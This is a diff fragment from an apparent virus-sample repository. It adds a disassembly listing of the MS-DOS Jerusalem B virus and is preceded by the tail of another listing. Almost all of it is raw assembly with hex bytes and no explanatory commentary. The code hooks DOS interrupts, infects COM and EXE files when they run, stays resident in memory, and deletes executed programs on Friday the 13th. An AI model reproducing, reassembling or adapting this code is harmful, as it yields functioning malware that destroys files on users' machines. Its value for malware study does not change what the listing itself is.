+0000:0539 83D200 ADC DX,0000H +0000:053C 723A X053C: JB X0578 +0000:053E F7367800 DIV WORD PTR [Y0078H] +0000:0542 0BD2 OR DX,DX +0000:0544 7401 JZ X0547 +0000:0546 40 INC AX +0000:0547 A35300 X0547: MOV Y0053H,AX +0000:054A 89165100 MOV [Y0051H],DX +0000:054E A17C00 MOV AX,Y007CH +0000:0551 8B167E00 MOV DX,[Y007EH] +0000:0555 F7367A00 DIV WORD PTR [Y007AH] +0000:0559 2B065700 SUB AX,[Y0057H] +0000:055D A36500 MOV Y0065H,AX +0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H +0000:0566 A35D00 MOV Y005DH,AX +0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H +0000:056F 33C9 XOR CX,CX +0000:0571 8BD1 MOV DX,CX +0000:0573 B80042 MOV AX,04200H +0000:0576 CD21 INT 021H + +"JV.MOC" PAGE 0011 + +0000:0578 720A X0578: JB X0584 +0000:057A B91C00 MOV CX,001CH +0000:057D BA4F00 MOV DX,004FH +0000:0580 B440 MOV AH,040H +0000:0582 CD21 INT 021H +0000:0584 7211 X0584: JB X0597 +0000:0586 3BC1 CMP AX,CX +0000:0588 7518 JNZ X05A2 +0000:058A 8B167C00 MOV DX,[Y007CH] +0000:058E 8B0E7E00 MOV CX,[Y007EH] +0000:0592 B80042 MOV AX,04200H +0000:0595 CD21 INT 021H +0000:0597 7209 X0597: JB X05A2 +0000:0599 33D2 XOR DX,DX +0000:059B B91007 MOV CX,0710H +0000:059E B440 MOV AH,040H +0000:05A0 CD21 INT 021H +0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H +0000:05A8 7404 JZ X05AE +0000:05AA B449 MOV AH,049H +0000:05AC CD21 INT 021H +0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH +0000:05B4 7431 JZ X05E7 +0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:05BB 2E8B167400 MOV DX,CS:[Y0074H] +0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H] +0000:05C5 B80157 MOV AX,05701H +0000:05C8 CD21 INT 021H +0000:05CA B43E MOV AH,03EH +0000:05CC CD21 INT 021H +0000:05CE 2EC5168000 LDS DX,CS:[Y0080H] +0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H] +0000:05D8 B80143 MOV AX,04301H +0000:05DB CD21 INT 021H +0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH] +0000:05E2 B82425 MOV AX,02524H +0000:05E5 CD21 INT 021H +0000:05E7 07 X05E7: POP ES +0000:05E8 1F POP DS +0000:05E9 5F POP DI +0000:05EA 5E POP SI +0000:05EB 5A POP DX +0000:05EC 59 POP CX +0000:05ED 5B POP BX +0000:05EE 58 POP AX +0000:05EF 9D POPF +0000:05F0 2EFF2E1700 JMP CS:[Y0017H] +0000:05F5 0000 X05F5: ADD [BX+SI],AL +0000:05F7 0000 ADD [BX+SI],AL +0000:05F9 0000 ADD [BX+SI],AL +0000:05FB 0000 ADD [BX+SI],AL +0000:05FD 0000 ADD [BX+SI],AL +0000:05FF 004D00 ADD [DI+00H],CL +0000:0602 000F ADD [BX],CL +0000:0604 0000 ADD [BX+SI],AL +0000:0606 0000 ADD [BX+SI],AL + +"JV.MOC" PAGE 0012 + +0000:0608 0000 ADD [BX+SI],AL +0000:060A 0000 ADD [BX+SI],AL +0000:060C 0000 ADD [BX+SI],AL +0000:060E 0000 ADD [BX+SI],AL +0000:0610 CD20 INT 020H +0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH +0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID +0000:0619 F02F LOCK DAS +0000:061B 018E1E3C ADD [BP+Y03C1EH],CX +0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX +0000:0623 048E ADD AL,08EH +0000:0625 1E PUSH DS +0000:0626 8E1EFFFF MOV DS,[Y0FFFFH] +0000:062A FFFF ??? DI +0000:062C FFFF ??? DI +0000:062E FFFF ??? DI +0000:0630 FFFF ??? DI +0000:0632 FFFF ??? DI +0000:0634 FFFF ??? DI +0000:0636 FFFF ??? DI +0000:0638 FFFF ??? DI +0000:063A FFFF ??? DI +0000:063C 7C1F JL X065D +0000:063E DE3E8D29 ESC 037H,[Y0298DH] +0000:0642 1400 ADC AL,00H +0000:0644 1800 SBB [BX+SI],AL +0000:0646 F1 DB 0F1H +0000:0647 1F POP DS +0000:0648 FFFF ??? DI +0000:064A FFFF ??? DI +0000:064C 0000 ADD [BX+SI],AL +0000:064E 0000 ADD [BX+SI],AL +0000:0650 0000 ADD [BX+SI],AL +0000:0652 0000 ADD [BX+SI],AL +0000:0654 0000 ADD [BX+SI],AL +0000:0656 0000 ADD [BX+SI],AL +0000:0658 0000 ADD [BX+SI],AL +0000:065A 0000 ADD [BX+SI],AL +0000:065C 0000 ADD [BX+SI],AL +0000:065E 0000 ADD [BX+SI],AL +0000:0660 CD21 INT 021H +0000:0662 CB RET ; INTERSEGMENT +0000:0663 0000 X0663: ADD [BX+SI],AL +0000:0665 0000 ADD [BX+SI],AL +0000:0667 0000 ADD [BX+SI],AL +0000:0669 0000 ADD [BX+SI],AL +0000:066B 0000 ADD [BX+SI],AL +0000:066D 2020 AND [BX+SI],AH +0000:066F 2020 AND [BX+SI],AH +0000:0671 2020 AND [BX+SI],AH +0000:0673 2020 AND [BX+SI],AH +0000:0675 2020 AND [BX+SI],AH +0000:0677 2000 AND [BX+SI],AL +0000:0679 0000 ADD [BX+SI],AL +0000:067B 0000 ADD [BX+SI],AL +0000:067D 2020 AND [BX+SI],AH + +"JV.MOC" PAGE 0013 + +0000:067F 2020 AND [BX+SI],AH +0000:0681 2020 AND [BX+SI],AH +0000:0683 2020 AND [BX+SI],AH +0000:0685 2020 AND [BX+SI],AH +0000:0687 2000 AND [BX+SI],AL +0000:0689 0000 ADD [BX+SI],AL +0000:068B 0000 ADD [BX+SI],AL +0000:068D 0000 ADD [BX+SI],AL +0000:068F 0000 ADD [BX+SI],AL +0000:0691 0D6B6F OR AX,06F6BH +0000:0694 6465 JZ X06FB +0000:0696 6572 JNZ X070A +0000:0698 7A2E JPE X06C8 +0000:069A 6578 JNZ X0714 +0000:069C 6520 JNZ X06BE +0000:069E 613A JNO X06DA +0000:06A0 6B6F JPO X0711 +0000:06A2 6465 JZ X0709 +0000:06A4 6572 JNZ X0718 +0000:06A6 2E6578 JNZ X0721 +0000:06A9 650D JNZ X06B8 +0000:06AB 0000 ADD [BX+SI],AL +0000:06AD 0000 ADD [BX+SI],AL +0000:06AF 0000 ADD [BX+SI],AL +0000:06B1 0000 ADD [BX+SI],AL +0000:06B3 0000 ADD [BX+SI],AL +0000:06B5 0000 ADD [BX+SI],AL +0000:06B7 0000 ADD [BX+SI],AL +0000:06B9 0000 ADD [BX+SI],AL +0000:06BB 0000 ADD [BX+SI],AL +0000:06BD 0000 ADD [BX+SI],AL +0000:06BF 0000 ADD [BX+SI],AL +0000:06C1 0000 ADD [BX+SI],AL +0000:06C3 0000 ADD [BX+SI],AL +0000:06C5 0000 ADD [BX+SI],AL +0000:06C7 0000 ADD [BX+SI],AL +0000:06C9 0000 ADD [BX+SI],AL +0000:06CB 0000 ADD [BX+SI],AL +0000:06CD 0000 ADD [BX+SI],AL +0000:06CF 0000 ADD [BX+SI],AL +0000:06D1 0000 ADD [BX+SI],AL +0000:06D3 0000 ADD [BX+SI],AL +0000:06D5 0000 ADD [BX+SI],AL +0000:06D7 0000 ADD [BX+SI],AL +0000:06D9 005718 ADD [BX+018H],DL +0000:06DC 0825 OR [DI],AH +0000:06DE A5 MOVSW +0000:06DF FEC5 INC CH +0000:06E1 07 POP ES +0000:06E2 1E PUSH DS +0000:06E3 0210 ADD DL,[BX+SI] +0000:06E5 07 POP ES +0000:06E6 57 PUSH DI +0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH +0000:06EB 0104 ADD [SI],AX +0000:06ED 7F70 JG X075F + +"JV.MOC" PAGE 0014 + +0000:06EF 0010 ADD [BX+SI],DL +0000:06F1 07 POP ES +0000:06F2 1D001C SBB AX,01C00H +0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP +0000:06F9 0C1B OR AL,01BH +0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH] +0000:06FF F24D REPNE DEC BP +0000:0701 360E PUSH CS +0000:0703 0300 ADD AX,[BX+SI] +0000:0705 0000 ADD [BX+SI],AL +0000:0707 00EE ADD DH,CH +0000:0709 002A X0709: ADD [BP+SI],CH +0000:070B 0F POP CS +0000:070C 42 INC DX +0000:070D 01C1 ADD CX,AX +0000:070F 0DB44C OR AX,04CB4H +0000:0712 B000 MOV AL,00H +0000:0714 CD21 X0714: INT 021H +0000:0716 4D DEC BP +0000:0717 7344 JAE X075D +0000:0719 6F73 JG X078E + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.jeru.lst b/MSDOS/Virus.MSDOS.Unknown.jeru.lst new file mode 100644 index 00000000..556a184d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jeru.lst @@ -0,0 +1,794 @@ +This is the Jerusalem B Virus. +"JV.MOC" PAGE 0001 + +0000:0000 E99200 JMP X0095 +0000:0003 7355 JAE X005A +0000:0005 4D DEC BP +0000:0006 7344 JAE X004C +0000:0008 6F73 JG X007D +0000:000A 0001 ADD [BX+DI],AL +0000:000C BD1700 MOV BP,0017H +0000:000F 0000 ADD [BX+SI],AL +0000:0011 06 PUSH ES +0000:0012 00A5FE00 ADD [DI+Y00FEH],AH +0000:0016 F016 LOCK PUSH SS +0000:0018 17 POP SS +0000:0019 7702 JA X001D +0000:001B BF053D MOV DI,03D05H +0000:001E 0CFB OR AL,0FBH +0000:0020 7D00 JGE X0022 +0000:0022 0000 X0022: ADD [BX+SI],AL +0000:0024 0000 ADD [BX+SI],AL +0000:0026 0000 ADD [BX+SI],AL +0000:0028 0000 ADD [BX+SI],AL +0000:002A 0000 ADD [BX+SI],AL +0000:002C 0000 ADD [BX+SI],AL +0000:002E E8062A CALL X2A37 +0000:0031 B10D MOV CL,0DH +0000:0033 800000 ADD BYTE PTR [BX+SI],00H +0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL +0000:003A 0D5C00 OR AX,005CH +0000:003D B10D MOV CL,0DH +0000:003F 6C00 JL X0041 +0000:0041 B10D X0041: MOV CL,0DH +0000:0043 0004 ADD [SI],AL +0000:0045 5F POP DI +0000:0046 0F POP CS +0000:0047 B400 MOV AH,00H +0000:0049 C1 RET ; INTRASEGMENT +0000:004A 0D00F0 X004A: OR AX,0F000H +0000:004D 06 PUSH ES +0000:004E 004D5A ADD [DI+05AH],CL +0000:0051 2000 AND [BX+SI],AL +0000:0053 1000 ADC [BX+SI],AL +0000:0055 1900 SBB [BX+SI],AX +0000:0057 0800 OR [BX+SI],AL +0000:0059 7500 JNZ X005B +0000:005B 7500 X005B: JNZ X005D +0000:005D 6901 X005D: JNS X0060 +0000:005F 1007 ADC [BX],AL +0000:0061 8419 TEST BL,[BX+DI] +0000:0063 C500 LDS AX,[BX+SI] +0000:0065 6901 JNS X0068 +0000:0067 1C00 SBB AL,00H +0000:0069 0000 ADD [BX+SI],AL +0000:006B 4C X006B: DEC SP +0000:006C B000 MOV AL,00H +0000:006E CD21 INT 021H +0000:0070 050020 ADD AX,02000H +0000:0073 0037 ADD [BX],DH + +"JV.MOC" PAGE 0002 + +0000:0075 121C ADC BL,[SI] +0000:0077 0100 ADD [BX+SI],AX +0000:0079 0210 ADD DL,[BX+SI] +0000:007B 0010 ADD [BX+SI],DL +0000:007D 17 X007D: POP SS +0000:007E 0000 ADD [BX+SI],AL +0000:0080 53 PUSH BX +0000:0081 61E8 JNO X006B +0000:0083 38434F CMP [BP+DI+04FH],AL +0000:0086 4D DEC BP +0000:0087 4D DEC BP +0000:0088 41 INC CX +0000:0089 4E DEC SI +0000:008A 44 INC SP +0000:008B 2E43 INC BX +0000:008D 4F DEC DI +0000:008E 4D DEC BP +0000:008F 0100 ADD [BX+SI],AX +0000:0091 0000 ADD [BX+SI],AL +0000:0093 0000 ADD [BX+SI],AL +0000:0095 FC X0095: CLD +0000:0096 B4E0 MOV AH,0E0H +0000:0098 CD21 INT 021H +0000:009A 80FCE0 CMP AH,0E0H +0000:009D 7316 JAE X00B5 +0000:009F 80FC03 CMP AH,03H +0000:00A2 7211 JB X00B5 +0000:00A4 B4DD MOV AH,0DDH +0000:00A6 BF0001 MOV DI,0100H +0000:00A9 BE1007 MOV SI,0710H +0000:00AC 03F7 ADD SI,DI +0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H] +0000:00B3 CD21 INT 021H +0000:00B5 8CC8 X00B5: MOV AX,CS +0000:00B7 051000 ADD AX,0010H +0000:00BA 8ED0 MOV SS,AX +0000:00BC BC0007 MOV SP,0700H +0000:00BF 50 PUSH AX +0000:00C0 B8C500 MOV AX,00C5H +0000:00C3 50 PUSH AX +0000:00C4 CB RET ; INTERSEGMENT +0000:00C5 FC X00C5: CLD +0000:00C6 06 PUSH ES +0000:00C7 2E8C063100 MOV CS:[Y0031H],ES +0000:00CC 2E8C063900 MOV CS:[Y0039H],ES +0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES +0000:00D6 2E8C064100 MOV CS:[Y0041H],ES +0000:00DB 8CC0 MOV AX,ES +0000:00DD 051000 ADD AX,0010H +0000:00E0 2E01064900 ADD CS:[Y0049H],AX +0000:00E5 2E01064500 ADD CS:[Y0045H],AX +0000:00EA B4E0 MOV AH,0E0H +0000:00EC CD21 INT 021H +0000:00EE 80FCE0 CMP AH,0E0H +0000:00F1 7313 JAE X0106 +0000:00F3 80FC03 CMP AH,03H + +"JV.MOC" PAGE 0003 + +0000:00F6 07 POP ES +0000:00F7 2E8E164500 MOV SS,CS:[Y0045H] +0000:00FC 2E8B264300 MOV SP,CS:[Y0043H] +0000:0101 2EFF2E4700 JMP CS:[Y0047H] +0000:0106 33C0 X0106: XOR AX,AX +0000:0108 8EC0 MOV ES,AX +0000:010A 26A1FC03 MOV AX,ES:Y03FCH +0000:010E 2EA34B00 MOV CS:Y004BH,AX +0000:0112 26A0FE03 MOV AL,ES:Y03FEH +0000:0116 2EA24D00 MOV CS:Y004DH,AL +0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H +0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH +0000:0127 58 POP AX +0000:0128 051000 ADD AX,0010H +0000:012B 8EC0 MOV ES,AX +0000:012D 0E PUSH CS +0000:012E 1F POP DS +0000:012F B91007 MOV CX,0710H +0000:0132 D1E9 SHR CX,1 +0000:0134 33F6 XOR SI,SI +0000:0136 8BFE MOV DI,SI +0000:0138 06 PUSH ES +0000:0139 B84201 MOV AX,0142H +0000:013C 50 PUSH AX +0000:013D EAFC030000 JMP X0000_03FC +0000:0142 8CC8 MOV AX,CS +0000:0144 8ED0 MOV SS,AX +0000:0146 BC0007 MOV SP,0700H +0000:0149 33C0 XOR AX,AX +0000:014B 8ED8 MOV DS,AX +0000:014D 2EA14B00 MOV AX,CS:Y004BH +0000:0151 A3FC03 MOV Y03FCH,AX +0000:0154 2EA04D00 MOV AL,CS:Y004DH +0000:0158 A2FE03 MOV Y03FEH,AL +0000:015B 8BDC MOV BX,SP +0000:015D B104 MOV CL,04H +0000:015F D3EB SHR BX,CL +0000:0161 83C310 ADD BX,0010H +0000:0164 2E891E3300 MOV CS:[Y0033H],BX +0000:0169 B44A MOV AH,04AH +0000:016B 2E8E063100 MOV ES,CS:[Y0031H] +0000:0170 CD21 INT 021H +0000:0172 B82135 MOV AX,03521H +0000:0175 CD21 INT 021H +0000:0177 2E891E1700 MOV CS:[Y0017H],BX +0000:017C 2E8C061900 MOV CS:[Y0019H],ES +0000:0181 0E PUSH CS +0000:0182 1F POP DS +0000:0183 BA5B02 MOV DX,025BH +0000:0186 B82125 MOV AX,02521H +0000:0189 CD21 INT 021H +0000:018B 8E063100 MOV ES,[Y0031H] +0000:018F 268E062C00 MOV ES,ES:[Y002CH] +0000:0194 33FF XOR DI,DI +0000:0196 B9FF7F MOV CX,07FFFH +0000:0199 32C0 XOR AL,AL + +"JV.MOC" PAGE 0004 + +0000:019B F2AE X019B: REPNE SCASB +0000:019D 263805 CMP ES:[DI],AL +0000:01A0 E0F9 LOOPNZ X019B +0000:01A2 8BD7 MOV DX,DI +0000:01A4 83C203 ADD DX,0003H +0000:01A7 B8004B MOV AX,04B00H +0000:01AA 06 PUSH ES +0000:01AB 1F POP DS +0000:01AC 0E PUSH CS +0000:01AD 07 POP ES +0000:01AE BB3500 MOV BX,0035H +0000:01B1 1E PUSH DS +0000:01B2 06 PUSH ES +0000:01B3 50 PUSH AX +0000:01B4 53 PUSH BX +0000:01B5 51 PUSH CX +0000:01B6 52 PUSH DX +0000:01B7 B42A MOV AH,02AH +0000:01B9 CD21 INT 021H +0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H +0000:01C1 81F9C307 CMP CX,07C3H +0000:01C5 7430 JZ X01F7 +0000:01C7 3C05 CMP AL,05H +0000:01C9 750D JNZ X01D8 +0000:01CB 80FA0D CMP DL,0DH +0000:01CE 7508 JNZ X01D8 +0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH] +0000:01D5 EB20 JMP X01F7 +0000:01D7 90 NOP +0000:01D8 B80835 X01D8: MOV AX,03508H +0000:01DB CD21 INT 021H +0000:01DD 2E891E1300 MOV CS:[Y0013H],BX +0000:01E2 2E8C061500 MOV CS:[Y0015H],ES +0000:01E7 0E PUSH CS +0000:01E8 1F POP DS +0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H +0000:01EF B80825 MOV AX,02508H +0000:01F2 BA1E02 MOV DX,021EH +0000:01F5 CD21 INT 021H +0000:01F7 5A X01F7: POP DX +0000:01F8 59 POP CX +0000:01F9 5B POP BX +0000:01FA 58 POP AX +0000:01FB 07 POP ES +0000:01FC 1F POP DS +0000:01FD 9C PUSHF +0000:01FE 2EFF1E1700 CALL CS:[Y0017H] +0000:0203 1E PUSH DS +0000:0204 07 POP ES +0000:0205 B449 MOV AH,049H +0000:0207 CD21 INT 021H +0000:0209 B44D MOV AH,04DH +0000:020B CD21 INT 021H +0000:020D B431 MOV AH,031H +0000:020F BA0006 MOV DX,0600H +0000:0212 B104 MOV CL,04H + +"JV.MOC" PAGE 0005 + +0000:0214 D3EA SHR DX,CL +0000:0216 83C210 ADD DX,0010H +0000:0219 CD21 INT 021H +0000:021B 32C0 XOR AL,AL +0000:021D CF IRET +0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H +0000:0224 7517 JNZ X023D +0000:0226 50 PUSH AX +0000:0227 53 PUSH BX +0000:0228 51 PUSH CX +0000:0229 52 PUSH DX +0000:022A 55 PUSH BP +0000:022B B80206 MOV AX,0602H +0000:022E B787 MOV BH,087H +0000:0230 B90505 MOV CX,0505H +0000:0233 BA1010 MOV DX,01010H +0000:0236 CD10 INT 010H +0000:0238 5D POP BP +0000:0239 5A POP DX +0000:023A 59 POP CX +0000:023B 5B POP BX +0000:023C 58 POP AX +0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH] +0000:0242 7512 JNZ X0256 +0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H +0000:024B 50 PUSH AX +0000:024C 51 PUSH CX +0000:024D 56 PUSH SI +0000:024E B90140 MOV CX,04001H +0000:0251 F3AC REPE LODSB +0000:0253 5E POP SI +0000:0254 59 POP CX +0000:0255 58 POP AX +0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H] +0000:025B 9C X025B: PUSHF +0000:025C 80FCE0 CMP AH,0E0H +0000:025F 7505 JNZ X0266 +0000:0261 B80003 MOV AX,0300H +0000:0264 9D POPF +0000:0265 CF IRET +0000:0266 80FCDD X0266: CMP AH,0DDH +0000:0269 7413 JZ X027E +0000:026B 80FCDE CMP AH,0DEH +0000:026E 7428 JZ X0298 +0000:0270 3D004B CMP AX,04B00H +0000:0273 7503 JNZ X0278 +0000:0275 E9B400 JMP X032C +0000:0278 9D X0278: POPF +0000:0279 2EFF2E1700 JMP CS:[Y0017H] +0000:027E 58 X027E: POP AX +0000:027F 58 POP AX +0000:0280 B80001 MOV AX,0100H +0000:0283 2EA30A00 MOV CS:Y000AH,AX +0000:0287 58 POP AX +0000:0288 2EA30C00 MOV CS:Y000CH,AX +0000:028C F3A4 REPE MOVSB + +"JV.MOC" PAGE 0006 + +0000:028E 9D POPF +0000:028F 2EA10F00 MOV AX,CS:Y000FH +0000:0293 2EFF2E0A00 JMP CS:[Y000AH] +0000:0298 83C406 X0298: ADD SP,0006H +0000:029B 9D POPF +0000:029C 8CC8 MOV AX,CS +0000:029E 8ED0 MOV SS,AX +0000:02A0 BC1007 MOV SP,0710H +0000:02A3 06 PUSH ES +0000:02A4 06 PUSH ES +0000:02A5 33FF XOR DI,DI +0000:02A7 0E PUSH CS +0000:02A8 07 POP ES +0000:02A9 B91000 MOV CX,0010H +0000:02AC 8BF3 MOV SI,BX +0000:02AE BF2100 MOV DI,0021H +0000:02B1 F3A4 REPE MOVSB +0000:02B3 8CD8 MOV AX,DS +0000:02B5 8EC0 MOV ES,AX +0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH] +0000:02BC 2E03062B00 ADD AX,CS:[Y002BH] +0000:02C1 83D200 ADC DX,0000H +0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH] +0000:02C9 8ED8 MOV DS,AX +0000:02CB 8BF2 MOV SI,DX +0000:02CD 8BFA MOV DI,DX +0000:02CF 8CC5 MOV BP,ES +0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH] +0000:02D6 0BDB OR BX,BX +0000:02D8 7413 JZ X02ED +0000:02DA B90080 X02DA: MOV CX,08000H +0000:02DD F3A5 REPE MOVSW +0000:02DF 050010 ADD AX,01000H +0000:02E2 81C50010 ADD BP,01000H +0000:02E6 8ED8 MOV DS,AX +0000:02E8 8EC5 MOV ES,BP +0000:02EA 4B DEC BX +0000:02EB 75ED JNZ X02DA +0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH] +0000:02F2 F3A4 REPE MOVSB +0000:02F4 58 POP AX +0000:02F5 50 PUSH AX +0000:02F6 051000 ADD AX,0010H +0000:02F9 2E01062900 ADD CS:[Y0029H],AX +0000:02FE 2E01062500 ADD CS:[Y0025H],AX +0000:0303 2EA12100 MOV AX,CS:Y0021H +0000:0307 1F POP DS +0000:0308 07 POP ES +0000:0309 2E8E162900 MOV SS,CS:[Y0029H] +0000:030E 2E8B262700 MOV SP,CS:[Y0027H] +0000:0313 2EFF2E2300 JMP CS:[Y0023H] +0000:0318 33C9 X0318: XOR CX,CX +0000:031A B80143 MOV AX,04301H +0000:031D CD21 INT 021H +0000:031F B441 MOV AH,041H +0000:0321 CD21 INT 021H + +"JV.MOC" PAGE 0007 + +0000:0323 B8004B MOV AX,04B00H +0000:0326 9D POPF +0000:0327 2EFF2E1700 JMP CS:[Y0017H] +0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H +0000:0332 74E4 JZ X0318 +0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H +0000:0342 2E89168000 MOV CS:[Y0080H],DX +0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS +0000:034C 50 PUSH AX +0000:034D 53 PUSH BX +0000:034E 51 PUSH CX +0000:034F 52 PUSH DX +0000:0350 56 PUSH SI +0000:0351 57 PUSH DI +0000:0352 1E PUSH DS +0000:0353 06 PUSH ES +0000:0354 FC CLD +0000:0355 8BFA MOV DI,DX +0000:0357 32D2 XOR DL,DL +0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH +0000:035D 7505 JNZ X0364 +0000:035F 8A15 MOV DL,[DI] +0000:0361 80E21F AND DL,01FH +0000:0364 B436 X0364: MOV AH,036H +0000:0366 CD21 INT 021H +0000:0368 3DFFFF CMP AX,0FFFFH +0000:036B 7503 JNZ X0370 +0000:036D E97702 X036D: JMP X05E7 +0000:0370 F7E3 X0370: MUL BX +0000:0372 F7E1 MUL CX +0000:0374 0BD2 OR DX,DX +0000:0376 7505 JNZ X037D +0000:0378 3D1007 CMP AX,0710H +0000:037B 72F0 JB X036D +0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H] +0000:0382 1E PUSH DS +0000:0383 07 POP ES +0000:0384 32C0 XOR AL,AL +0000:0386 B94100 MOV CX,0041H +0000:0389 F2AE REPNE SCASB +0000:038B 2E8B368000 MOV SI,CS:[Y0080H] +0000:0390 8A04 X0390: MOV AL,[SI] +0000:0392 0AC0 OR AL,AL +0000:0394 740E JZ X03A4 +0000:0396 3C61 CMP AL,061H +0000:0398 7207 JB X03A1 +0000:039A 3C7A CMP AL,07AH +0000:039C 7703 JA X03A1 +0000:039E 802C20 SUB BYTE PTR [SI],020H +0000:03A1 46 X03A1: INC SI +0000:03A2 EBEC JMP X0390 +0000:03A4 B90B00 X03A4: MOV CX,000BH +0000:03A7 2BF1 SUB SI,CX +0000:03A9 BF8400 MOV DI,0084H +0000:03AC 0E PUSH CS + +"JV.MOC" PAGE 0008 + +0000:03AD 07 POP ES +0000:03AE B90B00 MOV CX,000BH +0000:03B1 F3A6 REPE CMPSB +0000:03B3 7503 JNZ X03B8 +0000:03B5 E92F02 JMP X05E7 +0000:03B8 B80043 X03B8: MOV AX,04300H +0000:03BB CD21 INT 021H +0000:03BD 7205 JB X03C4 +0000:03BF 2E890E7200 MOV CS:[Y0072H],CX +0000:03C4 7225 X03C4: JB X03EB +0000:03C6 32C0 XOR AL,AL +0000:03C8 2EA24E00 MOV CS:Y004EH,AL +0000:03CC 1E PUSH DS +0000:03CD 07 POP ES +0000:03CE 8BFA MOV DI,DX +0000:03D0 B94100 MOV CX,0041H +0000:03D3 F2AE REPNE SCASB +0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH +0000:03D9 740B JZ X03E6 +0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH +0000:03DF 7405 JZ X03E6 +0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH] +0000:03E6 B8003D X03E6: MOV AX,03D00H +0000:03E9 CD21 INT 021H +0000:03EB 725A X03EB: JB X0447 +0000:03ED 2EA37000 MOV CS:Y0070H,AX +0000:03F1 8BD8 MOV BX,AX +0000:03F3 B80242 MOV AX,04202H +0000:03F6 B9FFFF MOV CX,0FFFFH +0000:03F9 BAFBFF MOV DX,0FFFBH +0000:03FC CD21 X03FC: INT 021H +0000:03FE 72EB JB X03EB +0000:0400 050500 ADD AX,0005H +0000:0403 2EA31100 MOV CS:Y0011H,AX +0000:0407 B90500 MOV CX,0005H +0000:040A BA6B00 MOV DX,006BH +0000:040D 8CC8 MOV AX,CS +0000:040F 8ED8 MOV DS,AX +0000:0411 8EC0 MOV ES,AX +0000:0413 B43F MOV AH,03FH +0000:0415 CD21 INT 021H +0000:0417 8BFA MOV DI,DX +0000:0419 BE0500 MOV SI,0005H +0000:041C F3A6 REPE CMPSB +0000:041E 7507 JNZ X0427 +0000:0420 B43E MOV AH,03EH +0000:0422 CD21 INT 021H +0000:0424 E9C001 JMP X05E7 +0000:0427 B82435 X0427: MOV AX,03524H +0000:042A CD21 INT 021H +0000:042C 891E1B00 MOV [Y001BH],BX +0000:0430 8C061D00 MOV [Y001DH],ES +0000:0434 BA1B02 MOV DX,021BH +0000:0437 B82425 MOV AX,02524H +0000:043A CD21 INT 021H +0000:043C C5168000 LDS DX,[Y0080H] + +"JV.MOC" PAGE 0009 + +0000:0440 33C9 XOR CX,CX +0000:0442 B80143 MOV AX,04301H +0000:0445 CD21 INT 021H +0000:0447 723B X0447: JB X0484 +0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:044E B43E MOV AH,03EH +0000:0450 CD21 INT 021H +0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:0459 B8023D MOV AX,03D02H +0000:045C CD21 INT 021H +0000:045E 7224 JB X0484 +0000:0460 2EA37000 MOV CS:Y0070H,AX +0000:0464 8CC8 MOV AX,CS +0000:0466 8ED8 MOV DS,AX +0000:0468 8EC0 MOV ES,AX +0000:046A 8B1E7000 MOV BX,[Y0070H] +0000:046E B80057 MOV AX,05700H +0000:0471 CD21 INT 021H +0000:0473 89167400 MOV [Y0074H],DX +0000:0477 890E7600 MOV [Y0076H],CX +0000:047B B80042 MOV AX,04200H +0000:047E 33C9 XOR CX,CX +0000:0480 8BD1 MOV DX,CX +0000:0482 CD21 INT 021H +0000:0484 723D X0484: JB X04C3 +0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H +0000:048B 7403 JZ X0490 +0000:048D EB57 JMP X04E6 +0000:048F 90 NOP +0000:0490 BB0010 X0490: MOV BX,01000H +0000:0493 B448 MOV AH,048H +0000:0495 CD21 INT 021H +0000:0497 730B JAE X04A4 +0000:0499 B43E MOV AH,03EH +0000:049B 8B1E7000 MOV BX,[Y0070H] +0000:049F CD21 INT 021H +0000:04A1 E94301 JMP X05E7 +0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH] +0000:04A8 8EC0 MOV ES,AX +0000:04AA 33F6 XOR SI,SI +0000:04AC 8BFE MOV DI,SI +0000:04AE B91007 MOV CX,0710H +0000:04B1 F3A4 REPE MOVSB +0000:04B3 8BD7 MOV DX,DI +0000:04B5 8B0E1100 MOV CX,[Y0011H] +0000:04B9 